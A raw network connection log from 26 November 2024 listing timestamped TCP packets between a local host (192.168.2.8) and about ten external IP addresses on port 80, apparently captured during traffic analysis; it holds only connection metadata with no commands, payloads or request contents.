                                                                                Nov 26, 2024 09:28:27.150599957 CET8049724173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:28.400685072 CET8049724173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:28.400722980 CET8049724173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:28.400783062 CET4972480192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:28.532824993 CET4972480192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:29.551985025 CET4972580192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:29.672647953 CET8049725173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:29.673633099 CET4972580192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:29.682641983 CET4972580192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:29.802655935 CET8049725173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:31.005750895 CET8049725173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:31.005769968 CET8049725173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:31.005925894 CET4972580192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:31.009406090 CET4972580192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:31.129398108 CET8049725173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:36.938642025 CET4972680192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:37.058711052 CET804972613.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:37.065845013 CET4972680192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:37.174638033 CET4972680192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:37.294791937 CET804972613.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:38.674643993 CET4972680192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:38.795089960 CET804972613.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:38.795253038 CET4972680192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:39.774802923 CET4972780192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:39.894918919 CET804972713.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:39.895015001 CET4972780192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:40.097840071 CET4972780192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:40.219871044 CET804972713.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:41.611140013 CET4972780192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:41.731997013 CET804972713.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:41.732058048 CET4972780192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:42.630810976 CET4972880192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:42.751013994 CET804972813.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:42.752962112 CET4972880192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:42.767025948 CET4972880192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:42.887142897 CET804972813.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:42.887207031 CET804972813.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:44.282886982 CET4972880192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:44.403196096 CET804972813.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:44.403400898 CET4972880192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:45.301595926 CET4972980192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:45.421919107 CET804972913.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:45.423240900 CET4972980192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:45.433423042 CET4972980192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:45.553503990 CET804972913.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:47.196552992 CET804972913.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:47.196573973 CET804972913.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:47.196588039 CET804972913.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:47.196600914 CET804972913.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:47.196729898 CET4972980192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:47.202663898 CET4972980192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:47.322848082 CET804972913.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:29:01.069724083 CET4973080192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:01.189955950 CET804973013.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:01.192846060 CET4973080192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:01.206409931 CET4973080192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:01.326445103 CET804973013.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:02.296447039 CET804973013.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:02.296561956 CET4973080192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:02.752844095 CET4973080192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:02.873239040 CET804973013.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:03.783857107 CET4973180192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:03.904021025 CET804973113.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:03.904114008 CET4973180192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:03.925929070 CET4973180192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:04.046046019 CET804973113.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:05.098381996 CET804973113.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:05.098511934 CET4973180192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:05.442717075 CET4973180192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:05.562819004 CET804973113.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:06.458260059 CET4973280192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:06.578389883 CET804973213.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:06.578532934 CET4973280192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:06.592339039 CET4973280192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:06.712811947 CET804973213.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:06.712832928 CET804973213.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:07.723377943 CET804973213.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:07.723439932 CET4973280192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:08.095416069 CET4973280192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:08.215852976 CET804973213.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:09.114711046 CET4973380192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:09.234957933 CET804973313.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:09.238415956 CET4973380192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:09.250710011 CET4973380192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:09.370748043 CET804973313.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:10.336684942 CET804973313.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:10.336800098 CET804973313.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:10.336980104 CET4973380192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:10.339993954 CET4973380192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:10.460074902 CET804973313.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:16.278610945 CET4973480192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:16.398682117 CET804973438.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:16.398770094 CET4973480192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:16.413953066 CET4973480192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:16.534956932 CET804973438.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:17.923899889 CET4973480192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:18.035614967 CET804973438.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:18.035684109 CET804973438.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:18.035731077 CET4973480192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:18.035772085 CET4973480192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:18.043950081 CET804973438.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:18.044008970 CET4973480192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:18.998424053 CET4973580192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:19.118568897 CET804973538.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:19.118896008 CET4973580192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:19.234749079 CET4973580192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:19.354974031 CET804973538.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:20.664648056 CET804973538.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:20.664669037 CET804973538.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:20.664912939 CET4973580192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:20.738732100 CET4973580192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:21.871553898 CET4973680192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:21.991780996 CET804973638.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:21.991930008 CET4973680192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:22.082773924 CET4973680192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:22.203206062 CET804973638.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:22.203250885 CET804973638.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:23.582566977 CET804973638.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:23.582592964 CET804973638.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:23.582659960 CET4973680192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:23.595568895 CET4973680192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:24.614818096 CET4973780192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:24.735099077 CET804973738.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:24.742768049 CET4973780192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:24.750760078 CET4973780192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:24.870927095 CET804973738.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:26.297172070 CET804973738.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:26.297198057 CET804973738.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:26.297337055 CET4973780192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:26.300601006 CET4973780192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:26.420552969 CET804973738.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:31.809704065 CET4973880192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:31.930335999 CET8049738199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:31.930428982 CET4973880192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:31.949333906 CET4973880192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:32.069710970 CET8049738199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:33.212165117 CET8049738199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:33.212234020 CET8049738199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:33.212331057 CET4973880192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:33.476690054 CET4973880192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:34.489736080 CET4973980192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:34.609854937 CET8049739199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:34.615170956 CET4973980192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:34.629225969 CET4973980192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:34.750664949 CET8049739199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:35.890691042 CET8049739199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:35.890749931 CET8049739199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:35.890806913 CET4973980192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:36.142626047 CET4973980192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:37.161456108 CET4974080192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:37.281579971 CET8049740199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:37.281728983 CET4974080192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:37.297075987 CET4974080192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:37.417334080 CET8049740199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:37.417426109 CET8049740199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:38.677603960 CET8049740199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:38.677727938 CET8049740199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:38.678072929 CET4974080192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:38.798762083 CET4974080192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:39.818459988 CET4974180192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:39.938606024 CET8049741199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:39.938704967 CET4974180192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:39.949367046 CET4974180192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:40.069726944 CET8049741199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:41.219185114 CET8049741199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:41.219259024 CET8049741199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:41.221071959 CET4974180192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:41.223666906 CET4974180192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:41.343585968 CET8049741199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:46.898818016 CET4974280192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:47.020006895 CET8049742104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:47.022932053 CET4974280192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:47.037352085 CET4974280192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:47.157455921 CET8049742104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:48.196850061 CET8049742104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:48.197726011 CET8049742104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:48.197788954 CET4974280192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:48.549293041 CET4974280192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:49.568598032 CET4974380192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:49.688803911 CET8049743104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:49.688895941 CET4974380192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:49.708719015 CET4974380192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:49.828756094 CET8049743104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:50.901792049 CET8049743104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:50.902374983 CET8049743104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:50.905903101 CET4974380192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:51.220550060 CET4974380192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:52.240808964 CET4974480192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:52.361985922 CET8049744104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:52.362637043 CET4974480192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:52.599502087 CET4974480192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:52.725111961 CET8049744104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:52.725125074 CET8049744104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:53.572052956 CET8049744104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:53.572252989 CET8049744104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:53.572448015 CET8049744104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:53.572487116 CET4974480192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:53.572535038 CET4974480192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:54.111182928 CET4974480192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:55.209359884 CET4974580192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:55.329508066 CET8049745104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:55.329936028 CET4974580192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:55.430844069 CET4974580192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:55.551949978 CET8049745104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:56.496787071 CET8049745104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:56.496808052 CET8049745104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:56.496820927 CET8049745104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:56.496958017 CET4974580192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:56.499608994 CET4974580192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:56.620301008 CET8049745104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:30:03.724653959 CET4974680192.168.2.8208.91.197.27
                                                                                Nov 26, 2024 09:30:03.844803095 CET8049746208.91.197.27192.168.2.8
                                                                                Nov 26, 2024 09:30:03.844943047 CET4974680192.168.2.8208.91.197.27
                                                                                Nov 26, 2024 09:30:03.863311052 CET4974680192.168.2.8208.91.197.27
                                                                                Nov 26, 2024 09:30:03.983339071 CET8049746208.91.197.27192.168.2.8
                                                                                Nov 26, 2024 09:30:05.004369974 CET8049746208.91.197.27192.168.2.8
                                                                                Nov 26, 2024 09:30:05.004451990 CET4974680192.168.2.8208.91.197.27
                                                                                Nov 26, 2024 09:30:05.377224922 CET4974680192.168.2.8208.91.197.27
                                                                                Nov 26, 2024 09:30:05.497307062 CET8049746208.91.197.27192.168.2.8
                                                                                Nov 26, 2024 09:30:06.396356106 CET4974780192.168.2.8208.91.197.27
                                                                                Nov 26, 2024 09:30:06.517519951 CET8049747208.91.197.27192.168.2.8
                                                                                Nov 26, 2024 09:30:06.517608881 CET4974780192.168.2.8208.91.197.27
                                                                                Nov 26, 2024 09:30:06.536222935 CET4974780192.168.2.8208.91.197.27
                                                                                Nov 26, 2024 09:30:06.690916061 CET8049747208.91.197.27192.168.2.8
                                                                                Nov 26, 2024 09:30:07.775907040 CET8049747208.91.197.27192.168.2.8
                                                                                Nov 26, 2024 09:30:07.775975943 CET4974780192.168.2.8208.91.197.27
                                                                                Nov 26, 2024 09:30:08.048683882 CET4974780192.168.2.8208.91.197.27
                                                                                Nov 26, 2024 09:30:08.168912888 CET8049747208.91.197.27192.168.2.8
                                                                                Nov 26, 2024 09:30:09.067430019 CET4974880192.168.2.8208.91.197.27
                                                                                Nov 26, 2024 09:30:09.188385010 CET8049748208.91.197.27192.168.2.8
                                                                                Nov 26, 2024 09:30:09.188582897 CET4974880192.168.2.8208.91.197.27
                                                                                Nov 26, 2024 09:30:09.204523087 CET4974880192.168.2.8208.91.197.27
                                                                                Nov 26, 2024 09:30:09.325223923 CET8049748208.91.197.27192.168.2.8
                                                                                Nov 26, 2024 09:30:09.325237036 CET8049748208.91.197.27192.168.2.8
                                                                                Nov 26, 2024 09:30:10.347011089 CET8049748208.91.197.27192.168.2.8
                                                                                Nov 26, 2024 09:30:10.347079039 CET4974880192.168.2.8208.91.197.27
                                                                                Nov 26, 2024 09:30:10.720916986 CET4974880192.168.2.8208.91.197.27
                                                                                Nov 26, 2024 09:30:10.840948105 CET8049748208.91.197.27192.168.2.8
                                                                                Nov 26, 2024 09:30:11.739646912 CET4974980192.168.2.8208.91.197.27
                                                                                Nov 26, 2024 09:30:11.859715939 CET8049749208.91.197.27192.168.2.8
                                                                                Nov 26, 2024 09:30:11.859821081 CET4974980192.168.2.8208.91.197.27
                                                                                Nov 26, 2024 09:30:11.870946884 CET4974980192.168.2.8208.91.197.27
                                                                                Nov 26, 2024 09:30:11.991183996 CET8049749208.91.197.27192.168.2.8
                                                                                Nov 26, 2024 09:30:13.423017979 CET8049749208.91.197.27192.168.2.8
                                                                                Nov 26, 2024 09:30:13.423084021 CET8049749208.91.197.27192.168.2.8
                                                                                Nov 26, 2024 09:30:13.423120022 CET8049749208.91.197.27192.168.2.8
                                                                                Nov 26, 2024 09:30:13.423154116 CET8049749208.91.197.27192.168.2.8
                                                                                Nov 26, 2024 09:30:13.423588991 CET4974980192.168.2.8208.91.197.27
                                                                                Nov 26, 2024 09:30:13.427943945 CET4974980192.168.2.8208.91.197.27
                                                                                Nov 26, 2024 09:30:13.547875881 CET8049749208.91.197.27192.168.2.8
                                                                                Nov 26, 2024 09:30:19.703794956 CET4975080192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:19.824158907 CET8049750199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:19.824261904 CET4975080192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:19.841239929 CET4975080192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:19.961277962 CET8049750199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:20.966624022 CET8049750199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:20.966640949 CET8049750199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:20.966655970 CET8049750199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:20.966728926 CET4975080192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:21.345750093 CET4975080192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:22.364896059 CET4975180192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:22.488760948 CET8049751199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:22.488850117 CET4975180192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:22.507232904 CET4975180192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:22.627260923 CET8049751199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:23.585691929 CET8049751199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:23.585711002 CET8049751199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:23.585725069 CET8049751199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:23.586005926 CET4975180192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:24.017657995 CET4975180192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:25.038876057 CET4975280192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:25.158993959 CET8049752199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:25.159193993 CET4975280192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:25.182893991 CET4975280192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:25.303400993 CET8049752199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:25.303419113 CET8049752199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:26.306643009 CET8049752199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:26.306710005 CET8049752199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:26.306727886 CET8049752199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:26.306751013 CET4975280192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:26.306783915 CET4975280192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:26.690882921 CET4975280192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:27.709347010 CET4975380192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:27.829370022 CET8049753199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:27.829449892 CET4975380192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:27.840614080 CET4975380192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:27.962596893 CET8049753199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:28.971760035 CET8049753199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:28.971817970 CET8049753199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:28.971829891 CET8049753199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:28.972131014 CET4975380192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:28.976952076 CET4975380192.168.2.8199.59.243.227
                                                                                Nov 26, 2024 09:30:29.096868992 CET8049753199.59.243.227192.168.2.8
                                                                                Nov 26, 2024 09:30:34.801312923 CET4975480192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:30:34.921293020 CET804975413.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:30:34.921535015 CET4975480192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:30:34.935585022 CET4975480192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:30:35.055473089 CET804975413.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:30:36.069673061 CET804975413.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:30:36.069746017 CET4975480192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:30:36.439383984 CET4975480192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:30:36.559416056 CET804975413.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:30:37.458029985 CET4975580192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:30:37.578063011 CET804975513.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:30:37.578181028 CET4975580192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:30:37.594918013 CET4975580192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:30:37.715042114 CET804975513.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:30:38.775367975 CET804975513.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:30:38.779038906 CET4975580192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:30:39.098907948 CET4975580192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:30:39.218964100 CET804975513.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:30:40.122998953 CET4975680192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:30:40.242974997 CET804975613.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:30:40.243268967 CET4975680192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:30:40.393663883 CET4975680192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:30:40.515094995 CET804975613.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:30:40.515106916 CET804975613.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:30:41.356503963 CET804975613.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:30:41.356770992 CET4975680192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:30:41.923902035 CET4975680192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:30:42.043837070 CET804975613.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:30:43.134128094 CET4975780192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:30:43.256153107 CET804975713.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:30:43.256350040 CET4975780192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:30:43.267810106 CET4975780192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:30:43.388448000 CET804975713.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:30:44.357635975 CET804975713.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:30:44.357691050 CET804975713.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:30:44.357789040 CET4975780192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:30:44.360634089 CET4975780192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:30:44.480751038 CET804975713.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:30:49.757535934 CET4975880192.168.2.8185.26.237.170
                                                                                Nov 26, 2024 09:30:49.877546072 CET8049758185.26.237.170192.168.2.8
                                                                                Nov 26, 2024 09:30:49.877655029 CET4975880192.168.2.8185.26.237.170
                                                                                Nov 26, 2024 09:30:49.893357992 CET4975880192.168.2.8185.26.237.170
                                                                                Nov 26, 2024 09:30:50.013259888 CET8049758185.26.237.170192.168.2.8
